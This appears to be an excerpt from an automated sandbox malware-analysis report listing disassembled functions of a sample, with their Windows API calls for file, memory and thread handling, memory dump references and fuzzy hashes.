                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID: @
                                                            • API String ID: 1890195054-2766056989
                                                            • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                            • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                            • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                            • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                            Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                              • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                              • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                              • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$??2@ExceptionThrowmemmove
                                                            • String ID:
                                                            • API String ID: 4269121280-0
                                                            • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                            • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                            • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                            • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                            Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@H_prolog
                                                            • String ID:
                                                            • API String ID: 1329742358-0
                                                            • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                            • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                            • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                            • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                            Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@
                                                            • String ID:
                                                            • API String ID: 1936579350-0
                                                            • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                            • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                            • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                            • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                            Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                            • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                            • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                            • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                            Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                            • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: AllocExceptionStringThrow
                                                            • String ID:
                                                            • API String ID: 3773818493-0
                                                            • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                            • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                            • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                            • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                            Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 3168844106-0
                                                            • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                            • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                            • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                            • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                            Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                            • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                            • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                            • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                            Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                            • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                            • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                            • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                            Function 00411A2D Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                            • Instruction ID: 375caa893e42e0daca7b158ffe4b4b415bc54d3572d418f3e5e61c8e5be1c541
                                                            • Opcode Fuzzy Hash: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                            • Instruction Fuzzy Hash: 30F0F272500109BBCF029F85D901AEEBB36EB48354F00811ABA1161160D33A9961AB99
                                                            Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID:
                                                            • API String ID: 3498533004-0
                                                            • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                            • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                            • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                            • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                            Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                            • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                            • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                            • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                            Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _beginthreadex.MSVCRT ref: 00406552
                                                              • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_beginthreadex
                                                            • String ID:
                                                            • API String ID: 4034172046-0
                                                            • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                            • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                                            • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                            • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                                            Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                            • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                            • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                            • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                            Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                            • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                            • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                            • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                            Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: FileTime
                                                            • String ID:
                                                            • API String ID: 1425588814-0
                                                            • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                            • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                            • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                            • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                            Function 0040E9F7 Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: memmove
                                                            • String ID:
                                                            • API String ID: 2162964266-0
                                                            • Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                            • Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
                                                            • Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                            • Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54
                                                            Function 0040E5D3 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 432778473-0
                                                            • Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                            • Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
                                                            • Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                            • Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50
                                                            Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: free
                                                            • String ID:
                                                            • API String ID: 1294909896-0
                                                            • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                            • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                            • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                            • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                            Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
